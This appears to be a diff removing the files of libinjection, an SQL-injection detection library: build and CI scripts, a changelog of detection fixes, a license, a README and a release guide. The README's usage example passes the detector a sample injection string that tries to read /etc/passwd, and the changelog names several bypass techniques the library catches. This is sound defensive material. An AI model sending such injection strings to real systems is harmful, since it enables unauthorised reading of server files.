|
||||
if ! test "x$LMDB_VERSION" = "x"; then
|
||||
echo "v${LMDB_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${LMDB_DISPLAY}"
|
||||
fi
|
||||
if test "x$LMDB_FOUND" = "x2"; then
|
||||
echo " + LMDB ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## libxml2
|
||||
if test "x$LIBXML2_FOUND" = "x0"; then
|
||||
echo " + LibXML2 ....not found"
|
||||
fi
|
||||
if test "x$LIBXML2_FOUND" = "x1"; then
|
||||
echo -n " + LibXML2 ....found "
|
||||
if ! test "x$LIBXML2_VERSION" = "x"; then
|
||||
echo "v${LIBXML2_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${LIBXML2_DISPLAY}"
|
||||
fi
|
||||
if test "x$LIBXML2_FOUND" = "x2"; then
|
||||
echo " + LibXML2 ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## SSDEEP
|
||||
if test "x$SSDEEP_FOUND" = "x0"; then
|
||||
echo " + SSDEEP ....not found"
|
||||
fi
|
||||
if test "x$SSDEEP_FOUND" = "x1"; then
|
||||
echo -n " + SSDEEP ....found "
|
||||
if ! test "x$SSDEEP_VERSION" = "x"; then
|
||||
echo "v${SSDEEP_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${SSDEEP_DISPLAY}"
|
||||
fi
|
||||
if test "x$SSDEEP_FOUND" = "x2"; then
|
||||
echo " + SSDEEP ....disabled"
|
||||
fi
|
||||
|
||||
## LUA
|
||||
if test "x$LUA_FOUND" = "x0"; then
|
||||
echo " + LUA ....not found"
|
||||
fi
|
||||
if test "x$LUA_FOUND" = "x1"; then
|
||||
echo -n " + LUA ....found "
|
||||
if ! test "x$LUA_VERSION" = "x"; then
|
||||
echo "v${LUA_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${LUA_DISPLAY}"
|
||||
fi
|
||||
if test "x$LUA_FOUND" = "x2"; then
|
||||
echo " + LUA ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## PCRE2
|
||||
if test "x$PCRE2_FOUND" = "x0"; then
|
||||
echo " + PCRE2 ....not found"
|
||||
fi
|
||||
if test "x$PCRE2_FOUND" = "x1"; then
|
||||
echo -n " + PCRE2 ....found "
|
||||
if ! test "x$PCRE2_VERSION" = "x"; then
|
||||
echo "v${PCRE2_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${PCRE2_DISPLAY}"
|
||||
fi
|
||||
if test "x$PCRE2_FOUND" = "x2"; then
|
||||
echo " + PCRE2 ....disabled"
|
||||
fi
|
||||
|
||||
echo " "
|
||||
echo " Other Options"
|
||||
if test $buildTestUtilities = true; then
|
||||
if test $debugLogs = true; then
|
||||
echo " + Test Utilities ....enabled"
|
||||
else
|
||||
echo " + Test Utilities ....partially"
|
||||
fi
|
||||
else
|
||||
echo " + Test Utilities ....disabled"
|
||||
fi
|
||||
if test $debugLogs = true; then
|
||||
echo " + SecDebugLog ....enabled"
|
||||
else
|
||||
echo " + SecDebugLog ....disabled"
|
||||
fi
|
||||
|
||||
if test "$aflFuzzer" = "true"; then
|
||||
echo " + afl fuzzer ....enabled"
|
||||
echo " ($FUZZ_CPPCFLAGS)"
|
||||
else
|
||||
echo " + afl fuzzer ....disabled"
|
||||
fi
|
||||
|
||||
if test "$buildExamples" = "true"; then
|
||||
echo " + library examples ....enabled"
|
||||
else
|
||||
echo " + library examples ....disabled"
|
||||
fi
|
||||
|
||||
if test "$buildParser" = "true"; then
|
||||
echo " + Building parser ....enabled"
|
||||
else
|
||||
echo " + Building parser ....disabled"
|
||||
fi
|
||||
|
||||
if test "$mutexPm" = "true"; then
|
||||
echo " + Treating pm operations as critical section ....enabled"
|
||||
else
|
||||
echo " + Treating pm operations as critical section ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
echo " "
|
||||
|
||||
|
||||
if test "$aflFuzzer" = "true"; then
|
||||
echo "WARNING: afl fuzzer was enabled. Make sure you are using the"
|
||||
echo " 'afl-clang-fast' as the compiler, otherwise the compilation"
|
||||
echo " will fail."
|
||||
echo " "
|
||||
echo " You can set the compiler using:"
|
||||
echo " "
|
||||
echo " $ export CXX=afl-clang-fast++ "
|
||||
echo " $ export CC=afl-clang-fast "
|
||||
echo " "
|
||||
fi
|
||||
|
|
@ -1,87 +0,0 @@
|
|||
name: CI
|
||||
|
||||
on:
|
||||
push:
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
cppcheck:
|
||||
runs-on: ubuntu-20.04
|
||||
name: cppcheck
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
name: checkout repo
|
||||
- name: Setup Dependencies
|
||||
run: |
|
||||
sudo apt-get update -y -qq
|
||||
sudo apt-get install cppcheck
|
||||
- name: cppcheck
|
||||
run: |
|
||||
cppcheck --std=c89 \
|
||||
--enable=all \
|
||||
--inconclusive \
|
||||
--suppress=variableScope \
|
||||
--suppress=missingIncludeSystem \
|
||||
--quiet \
|
||||
--error-exitcode=1 \
|
||||
--template='{file}:{line} {id} {severity} {message}' \
|
||||
.
|
||||
|
||||
clang-static:
|
||||
runs-on: ubuntu-20.04
|
||||
name: clang static check
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
name: checkout repo
|
||||
- name: make analyze
|
||||
run: make analyze
|
||||
working-directory: src
|
||||
env:
|
||||
CFLAGS: '-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror'
|
||||
|
||||
build-linux:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-20.04, ubuntu-18.04, ubuntu-16.04]
|
||||
platform: [x32, x64]
|
||||
compiler: [gcc, clang]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Setup Dependencies
|
||||
run: |
|
||||
sudo apt-get update -y -qq
|
||||
sudo apt-get install valgrind
|
||||
- name: build
|
||||
run: make all
|
||||
- name: test
|
||||
run: make -e check
|
||||
- name: clean
|
||||
run: make clean
|
||||
- name: build pedantic
|
||||
run: make all
|
||||
env:
|
||||
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'
|
||||
- name: test valgrind
|
||||
run: make -e check
|
||||
env:
|
||||
VALGRIND: 'valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/home/runner/work/libinjection/libinjection/src/alpine.supp'
|
||||
|
||||
build-macos:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [macos-10.15]
|
||||
compiler: [gcc, clang]
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: build
|
||||
run: make all
|
||||
- name: test
|
||||
run: make -e check
|
||||
- name: clean
|
||||
run: make clean
|
||||
- name: build pedantic
|
||||
run: make all
|
||||
env:
|
||||
CFLAGS: '-Wall -Wextra -Werror -pedantic -ansi -g -O1'
|
|
@ -1,46 +0,0 @@
|
|||
*~
|
||||
*.pyc
|
||||
*.dSYM
|
||||
c/#*
|
||||
*.plist
|
||||
*.info
|
||||
*.gch
|
||||
*.gcov
|
||||
|
||||
# gnu autotest
|
||||
*.trs
|
||||
|
||||
#aclocal.m4
|
||||
app.info
|
||||
autom4te.cache
|
||||
#compile
|
||||
config.h
|
||||
#config.h.in
|
||||
#config.guess
|
||||
config.log
|
||||
config.status
|
||||
#config.sub
|
||||
#configure
|
||||
configure.scan
|
||||
coverage_report
|
||||
#depcomp
|
||||
#install-sh
|
||||
#libtool
|
||||
#ltmain.sh
|
||||
#Makefile.in
|
||||
#m4
|
||||
#missing
|
||||
stamp-h1
|
||||
*~
|
||||
*.html
|
||||
*.log
|
||||
*.o
|
||||
*.la
|
||||
*.so*
|
||||
*.a
|
||||
.deps
|
||||
*.tar*
|
||||
*.zip
|
||||
*.lo
|
||||
*.gcno
|
||||
*.gcda
|
|
@ -1,2 +0,0 @@
|
|||
see CHANGELOG.md
|
||||
|
|
@ -1,288 +0,0 @@
|
|||
# NEXT
|
||||
|
||||
* [#126](/client9/libinjection/issues/126) oracle false negative
|
||||
* [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS
|
||||
* [#112](/client9/libinjection/issues/112) fix shared library on macOS
|
||||
* [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS
|
||||
* [#113](/client9/libinjection/issues/113) save space in struct
|
||||
* [#126](/client9/libinjection/issues/126) add usage to sqli cli tool
|
||||
* [#125](/client9/libinjection/issues/125) many false positives
|
||||
* [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation
|
||||
|
||||
# v3.9.2 - 2016-05-21
|
||||
|
||||
* Release of whatever changes have been made over the last 2.5 years.
|
||||
|
||||
# v3.9.1 - 2013-12-26
|
||||
|
||||
Day-After-Christmas Edition
|
||||
|
||||
* No functional changes
|
||||
* Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD
|
||||
* For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux
|
||||
* Other minor style changes to header files.
|
||||
|
||||
|
||||
# v3.9.0 - 2013-11-29
|
||||
|
||||
Black Friday Edition
|
||||
|
||||
* Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h`
|
||||
* Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well.
|
||||
* Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally.
|
||||
* Over 400 unit tests now!
|
||||
* Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke.
|
||||
* PHP documentation fixes, thanks @LightOS
|
||||
|
||||
# v3.8.0 - 2013-10-18
|
||||
|
||||
LAMP Special Edition: MySQL and PHP improvements
|
||||
|
||||
* [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r)
|
||||
* Fixes to Lua testdriver and portability fixes
|
||||
* Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module.
|
||||
* API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases.
|
||||
|
||||
NOTE:
|
||||
Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem.
|
||||
|
||||
Here's why:
|
||||
|
||||
* Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0.
|
||||
* In addition, I've received a number of reports of generated code failing various static analysis
|
||||
* I can't triangulate which SWIG for which language for which OS will work for you
|
||||
* I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways.
|
||||
|
||||
# v3.7.1 -- 2013-10-13
|
||||
|
||||
* Remove un-needed code
|
||||
|
||||
# v3.7.0 -- 2013-10-13
|
||||
|
||||
Major Release
|
||||
|
||||
* [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub)
|
||||
* Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives.
|
||||
* [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel)
|
||||
* [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily)
|
||||
* Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems
|
||||
Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html
|
||||
* Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)`
|
||||
* Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
|
||||
# v3.6.0 -- 2013-09-11
|
||||
* New PHP API
|
||||
* Big fingerprint update
|
||||
** about 500 new fingerprints added based on fuzzing tests by Reto Ischi
|
||||
** about 700 impossible, dead fingerprints removed
|
||||
** adding folding rule for "sqltype sqltype -> sqltype" since
|
||||
`select binary binary binary 1` is valid
|
||||
* Other minor fingerprints added
|
||||
* -maybe- API change as typedefs and structs were re-arranged for SWIG
|
||||
|
||||
# v3.5.3 -- 2013-08-25
|
||||
* Fingerprint update -- `BETWEEN` operation bypasses
|
||||
* Fingerprint update -- `ANY/SOME` quasi-function bypasses
|
||||
* Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1`
|
||||
* Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
* More adjustments to the PHP/MYSQL backtick to reduce false positives
|
||||
|
||||
# v3.5.2 -- 2013-08-21
|
||||
* Fingerprint update. Credit: Reto Ischi
|
||||
|
||||
# v3.5.1 -- 2013-08-21
|
||||
* found regression in handling of PHP/MySQL backticks. Tests added
|
||||
* Dead code removed.
|
||||
* Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html)
|
||||
|
||||
# v3.5.0 -- 2013-08-21
|
||||
* Bug fix for libinjection_sqli_reset @brianrectanus
|
||||
https://github.com/client9/libinjection/pull/50
|
||||
* Non-critical parser fix for numbers with oracle's ending
|
||||
suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not
|
||||
(SELECT, 1F, ROM)
|
||||
* Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS
|
||||
* Better parsing of generated number forms of "10.e" and "10.10e"
|
||||
(these are actually table specifiers!) HT @LightOS
|
||||
* Change sizing of some static arrays to have a length >= 8
|
||||
For GCC based applications, this allows -fstack-protector to work
|
||||
and -Wstack-protector will now not emit errors.
|
||||
* Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS.
|
||||
About 10% performance loss with -fstack-protector-all
|
||||
* Improvements in reducing false positives, HT modsecurity team
|
||||
* Add fingerprint, HT @FluxReiners
|
||||
* Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL)
|
||||
* Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..."
|
||||
* Fi possible stack over-read, and improve detection of "sp_password" flag
|
||||
in short sqli HT modsecurity team
|
||||
|
||||
# v3.4.1 2013-07-18
|
||||
* Fingerprint update only HT @LightOS
|
||||
|
||||
# v3.4.0 2013-07-18
|
||||
|
||||
* Fix regression with COLLATE
|
||||
* Handle "procedure analyze" under MySQL
|
||||
* Make API most robust when setting flags
|
||||
* Add folding API
|
||||
* Add new all-C test driver to improve testing speed
|
||||
* Makefile cleanups
|
||||
* Fired Jenkins! Using in-house system.
|
||||
* Fixed bypass reported by @FluxReiners
|
||||
|
||||
# v3.3.0 2013-07-13
|
||||
|
||||
* change how backslash is handled to catch old MSSQL servers sqli
|
||||
See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
|
||||
for details
|
||||
* Reworking of COLLATE to handle MySQL, TSQL types automatically
|
||||
* Handle bizarro world TSQL '\%1' which is parsed as "0 % 1"
|
||||
* Better stacked query detection, fixing some regressions
|
||||
* Folding improvements
|
||||
* False positive improvements
|
||||
|
||||
|
||||
# v3.2.0 2013-07-12
|
||||
|
||||
* Parse binary litterals "0b010101" used by at least mysql and pgsql
|
||||
* Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules
|
||||
"-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS
|
||||
* Add parsing rules for COLLATION in MySQL, CREDIT @LightOS
|
||||
* Reduce false positives by removing all fingerprints that contained "sn"
|
||||
* Improvement in handling MySQL 'binary' quasi-operator/type
|
||||
* Improvements in folding
|
||||
* Removed dependency on SWIG for installing python module
|
||||
|
||||
# v3.1.0 2013-07-02
|
||||
|
||||
* Fix for parsing Oracle numeric literals
|
||||
* Fix for oracle whitespace with null char.
|
||||
* Add unusual SQL join types to keywords lists
|
||||
* Minor fixes to python API examples
|
||||
|
||||
# v3.0.0 2013-06-23
|
||||
|
||||
Big Release and Big Engine change. Highly recommend
|
||||
|
||||
* Numerous evasions and false positives fixed!
|
||||
* Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`.
|
||||
* Folding engine completely rewritten to be simpler and easier to extend, debug, port.
|
||||
* MySQL `backticks` now handled correctly
|
||||
* @"var" and @'var' parsed correctly (mysql)
|
||||
* ":=" operator parsed correctly
|
||||
* non-ascii SQL variables and barewords handled correctly
|
||||
* less false positives and those that are false positives
|
||||
are more "indeterminate cases" and are only in a few
|
||||
fingerprints
|
||||
* autogeneration of fingerprints with trivial SQL variations
|
||||
* support for pgsql $ strings
|
||||
* support for oracle's q and nq strings
|
||||
* support for mysql's n strings
|
||||
* parsing stats exposed
|
||||
* new swig bindings for python and lua, with callbacks into original scripting
|
||||
language for accept/reject of fingerprints (i.e. manage fingerprints in
|
||||
script, not C code)
|
||||
* Improved parsing of various special cases in MySQL
|
||||
* Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately.
|
||||
* Probably a bunch of other stuff too
|
||||
|
||||
# v2.0.4 2013-05-21 IMPORTANT
|
||||
|
||||
All users are advised to upgrade due to risk of DOS
|
||||
|
||||
## security
|
||||
* more fingerprints, more tests
|
||||
* Issue 34: fix infinite loop
|
||||
|
||||
# v2.0.3 2013-05-21
|
||||
|
||||
## security
|
||||
* Add variations on '1U(((', thanks @LightOS
|
||||
* Add automatically all variations on other cases of
|
||||
'parens padding'
|
||||
|
||||
# v2.0.2 2013-05-21
|
||||
|
||||
## security
|
||||
* Added fingerprint 'nU(kn' and variations, thanks to
|
||||
discussion with @ModSecurity .
|
||||
|
||||
# v2.0.1 2013-05-21
|
||||
|
||||
## security
|
||||
* Added fingerprint knknk, thanks @d0znpp
|
||||
|
||||
# v2.0.0 2013-05-17
|
||||
|
||||
Version 2 is more a software engineering release than SQLi.
|
||||
The API, the code, and filenames are improved for embedded
|
||||
use. Please see the README.md file for details on use.
|
||||
|
||||
## security
|
||||
|
||||
* Fix Issue30: detection of more small sqli forms with fingerprint "1c".
|
||||
* Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus
|
||||
|
||||
## API Changes
|
||||
|
||||
BIG CHANGES
|
||||
|
||||
* File name changes. These are the only relevant files:
|
||||
* `c/libinjection.h`
|
||||
* `c/libinjection_sqli.c`
|
||||
* `c/libinjection_sqli_data.h`
|
||||
* `COPYING`
|
||||
* Just need to include `libinjection.h` and link with `libinjection_sqli_.c`
|
||||
* `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated.
|
||||
Only use `#include "libinjection.h"`
|
||||
* API name changes `is_sqli` and `is_string_sqli` are now
|
||||
`libinjection_is_sqli` and `libinjection_is_string_sqli`
|
||||
* API change, `libinjection_is_sqli` now takes a 5th arg for callback data
|
||||
* API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5
|
||||
in which case, a default lookup of fingerprints is used.
|
||||
* `sqlmap_data.json` now includes fingerprint information, so people making
|
||||
ports only need to parse one file.
|
||||
|
||||
## other
|
||||
|
||||
* Allow `clang` compiler (also in Jenkins, a build with clang and
|
||||
make-scan is done)
|
||||
* Optimizations should result in > 10% performance improvement
|
||||
for normal workloads
|
||||
* Add `sqlite3` special functions and keywords (since why not)
|
||||
|
||||
# v1.2.0 2013-05-06
|
||||
|
||||
## security
|
||||
* fix regression in detecting SQLi of type '1c'
|
||||
|
||||
##
|
||||
* improved documentation, comments, edits.
|
||||
|
||||
# v1.1.0 2013-05-04
|
||||
|
||||
## security
|
||||
|
||||
* Fix for nested c-style comments used by postgresql and transact-sql.
|
||||
Thanks to @Kanatoko for the report.
|
||||
* Numerous additions to SQL functions lists (in particular pgsql, transact-sql
|
||||
and ms-access functions)
|
||||
Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error.
|
||||
Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-)
|
||||
* Adding of fingerprints to detect HPP attacks.
|
||||
* Algorihmically added new fingerprints to detect new _future_ sqli attacks. All of these
|
||||
new fingerprints have no been seen 'in the wild' yet.
|
||||
|
||||
## other
|
||||
|
||||
* Replaced BSD memmem with optimzed version. This eliminates all 3rd party code.
|
||||
* Added alpha python module (python setup.py install)
|
||||
* Added sqlparse_fingerprints.h and sqlparse_data.json to aid porting and embeddeding.
|
||||
* Added version number in sqlparse.h, based on
|
||||
http://www.python.org/dev/peps/pep-0386/#normalizedversion
|
||||
|
||||
# v1.0.0 2013-04-24
|
||||
|
||||
* retroactive initial release
|
||||
* all memory issues fixed
|
||||
|
|
@ -1,32 +0,0 @@
|
|||
Copyright (c) 2012-2016, Nick Galbreath
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
|
||||
3. Neither the name of the copyright holder nor the names of its
|
||||
contributors may be used to endorse or promote products derived from
|
||||
this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
|
||||
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
|
||||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
|
||||
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
|
||||
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
|
||||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
|
||||
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
||||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
|
||||
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
https://github.com/client9/libinjection
|
||||
http://opensource.org/licenses/BSD-3-Clause
|
|
@ -1,110 +0,0 @@
|
|||
|
||||
<img src="https://raw.githubusercontent.com/libinjection/libinjection/main/misc/libinjection.svg" width="70%">
|
||||
|
||||
![CI](https://github.com/libinjection/libinjection/workflows/CI/badge.svg)
|
||||
[![license](https://img.shields.io/badge/license-BSD_3--Clause-blue.svg?style=flat)](https://raw.githubusercontent.com/client9/libinjection/master/COPYING)
|
||||
|
||||
|
||||
|
||||
SQL / SQLI tokenizer parser analyzer. For
|
||||
|
||||
* C and C++
|
||||
* [PHP](https://libinjection.client9.com/doc-sqli-php)
|
||||
* [Python](https://libinjection.client9.com/doc-sqli-python)
|
||||
* [Lua](/lua)
|
||||
* [Java](https://github.com/jeonglee/Libinjection) (external port)
|
||||
* [LuaJIT/FFI] (https://github.com/p0pr0ck5/lua-ffi-libinjection) (external port)
|
||||
|
||||
See
|
||||
[https://www.client9.com/](https://www.client9.com/)
|
||||
for details and presentations.
|
||||
|
||||
Simple example:
|
||||
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <strings.h>
|
||||
#include <errno.h>
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
int main(int argc, const char* argv[])
|
||||
{
|
||||
struct libinjection_sqli_state state;
|
||||
int issqli;
|
||||
|
||||
const char* input = argv[1];
|
||||
size_t slen = strlen(input);
|
||||
|
||||
/* in real-world, you would url-decode the input, etc */
|
||||
|
||||
libinjection_sqli_init(&state, input, slen, FLAG_NONE);
|
||||
issqli = libinjection_is_sqli(&state);
|
||||
if (issqli) {
|
||||
fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);
|
||||
}
|
||||
return issqli;
|
||||
}
|
||||
```
|
||||
|
||||
```
|
||||
$ gcc -Wall -Wextra examples.c libinjection_sqli.c
|
||||
$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
|
||||
sqli detected with fingerprint of 's&1UE'
|
||||
```
|
||||
|
||||
More advanced samples:
|
||||
|
||||
* [sqli_cli.c](/src/sqli_cli.c)
|
||||
* [reader.c](/src/reader.c)
|
||||
* [fptool](/src/fptool.c)
|
||||
|
||||
VERSION INFORMATION
|
||||
===================
|
||||
|
||||
See [CHANGELOG](/CHANGELOG) for details.
|
||||
|
||||
Versions are listed as "major.minor.point"
|
||||
|
||||
Major are significant changes to the API and/or fingerprint format.
|
||||
Applications will need recompiling and/or refactoring.
|
||||
|
||||
Minor are C code changes. These may include
|
||||
* logical change to detect or suppress
|
||||
* optimization changes
|
||||
* code refactoring
|
||||
|
||||
Point releases are purely data changes. These may be safely applied.
|
||||
|
||||
QUALITY AND DIAGNOSITICS
|
||||
========================
|
||||
|
||||
The continuous integration results at
|
||||
https://travis-ci.org/client9/libinjection tests the following:
|
||||
|
||||
- [x] build and unit-tests under GCC
|
||||
- [x] build and unit-tests under Clang
|
||||
- [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org)
|
||||
- [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck)
|
||||
- [x] checks for memory errors using [valgrind](http://valgrind.org/)
|
||||
|
||||
LICENSE
|
||||
=============
|
||||
|
||||
Copyright (c) 2012-2016 Nick Galbreath
|
||||
|
||||
Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source
|
||||
license. See [COPYING](/COPYING) for details.
|
||||
|
||||
EMBEDDING
|
||||
=============
|
||||
|
||||
The [src](https://github.com/client9/libinjection/tree/master/src)
|
||||
directory contains everything, but you only need to copy the following
|
||||
into your source tree:
|
||||
|
||||
* [src/libinjection.h](/src/libinjection.h)
|
||||
* [src/libinjection_sqli.c](/src/libinjection_sqli.c)
|
||||
* [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h)
|
||||
* [COPYING](/COPYING)
|
||||
|
|
@ -1,33 +0,0 @@
|
|||
# libinjection release howto
|
||||
|
||||
Comments and improvements welcome.
|
||||
|
||||
## Update the internal version number
|
||||
|
||||
in `src/libinjection_sqli.c` edit the definition
|
||||
|
||||
```c
|
||||
#define LIBINJECTION_VERSION "3.9.1"
|
||||
```
|
||||
|
||||
## Update the CHANGELOG.md file
|
||||
|
||||
There isn't much of specific format. It's not GNU changelog style. Just make sure it looks good in markdown.
|
||||
|
||||
## test and commit
|
||||
|
||||
Something like this
|
||||
```sh
|
||||
make test
|
||||
git commit -m 'VERSION'
|
||||
```
|
||||
|
||||
## run ./tags.sh
|
||||
|
||||
This will get the version number from the file above and create a local
|
||||
and remote tag.
|
||||
|
||||
## HELP!
|
||||
|
||||
I would be great to dump a src tarball on github releases.
|
||||
|
|
@ -1,20 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# adjust as needed for your clang setup
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
|
||||
# stdout and stdin definitions
|
||||
#
|
||||
make clean
|
||||
export CC=clang
|
||||
export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror -fsanitize=address"
|
||||
make -e check
|
|
@ -1,20 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# adjust as needed for your clang setup
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
# -Wdisabled-macro-expansion triggered on some linux libc headers involving
|
||||
# stdout and stdin definitions
|
||||
#
|
||||
make clean
|
||||
export CC=clang
|
||||
